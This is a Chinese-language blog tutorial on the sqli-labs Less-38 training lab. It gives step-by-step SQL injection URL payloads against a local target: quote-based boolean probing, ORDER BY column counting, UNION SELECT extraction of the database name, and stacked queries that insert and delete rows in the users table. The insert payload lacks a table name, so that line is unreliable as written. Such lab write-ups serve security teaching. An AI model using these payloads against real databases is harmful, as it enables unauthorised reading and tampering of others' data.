sql_lab之sqli中的堆叠型注入(less-38)

爱喝水的泡泡2023-12-27 12:43

堆叠注入(less-38)

1.判断注入类型

http://127.0.0.3/less-38/?id=1' and 1=2 -- s 没有回显

http://127.0.0.3/less-38/?id=1' and 1=1 -- s 有回显

则说明是单字节'注入

2.查询字段数

http://127.0.0.3/less-38/?id=1' order by 4 -- s 报错

http://127.0.0.3/less-38/?id=1' order by 3 -- s 有回显

说明字段数为3

3.判断回显点

http://127.0.0.3/less-38/?id=-1' union select 1,2,3 -- s

4.查询数据库

http://127.0.0.3/less-38/?id=-1' union select 1,database(),3 -- s

接下来的步骤可以用联合查询进行查询

堆叠注入攻击

(1)在users表中添加一个用户

http://127.0.0.3/less-38/?id=1'; insert into values(17,'gao','a123456') -- s

证明添加成功

(2)在users表中删除一个用户

http://127.0.0.3/less-38/?id=1';delete from users where users.username='gao' -- s

表中没有gao这个用户,说明删除成功

相关推荐
数巨小码人34 分钟前
AI+数据库:国内DBA职业发展与国产化转型实践
数据库·人工智能·ai·dba
mask哥1 小时前
详解flink SQL基础(四)
java·大数据·数据库·sql·微服务·flink
左灯右行的爱情2 小时前
分库分表系列-基础内容
网络·数据库·oracle
会飞的土拨鼠呀2 小时前
K8s部署MySQL8.0数据库
数据库·容器·kubernetes
oYiMiYangGuang1233 小时前
【广告系列】流量优选
数据库
小蒜学长3 小时前
vue家教预约平台设计与实现(代码+数据库+LW)
java·数据库·vue.js·spring boot·后端
专注VB编程开发20年3 小时前
对excel xlsx文件格式当成压缩包ZIP添加新的目录和文件后,OpenXml、NPOI、EPPlus、Spire.Office组件还能读出来吗
数据库·c#·excel
小戈爱学习4 小时前
OpenLDAP 服务搭建与配置全流程指南
服务器·数据库·oracle
俊昭喜喜里4 小时前
C#和SQL Server Management Studio的连接
服务器·数据库·c#
携欢6 小时前
Portswigger靶场之 Blind SQL injection with time delays通关秘籍
数据库·sql
热门推荐
01UV安装并设置国内源02如何在Windows/Linux系统上安装adb03【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)04Cursor 快速入门指南:从安装到核心功能05不再让Windows更新!&Edge游戏助手卸载及关闭自动更新06Claude Code VSCode集成开发指南:AI编程助手完整配置07【踩坑笔记】50系显卡适配的 PyTorch 安装082025最新国内服务器可用docker源仓库地址大全(2025年8月更新)09Redis 下载与安装 教程 windows版10KGG转MP3工具|非KGM文件|解密音频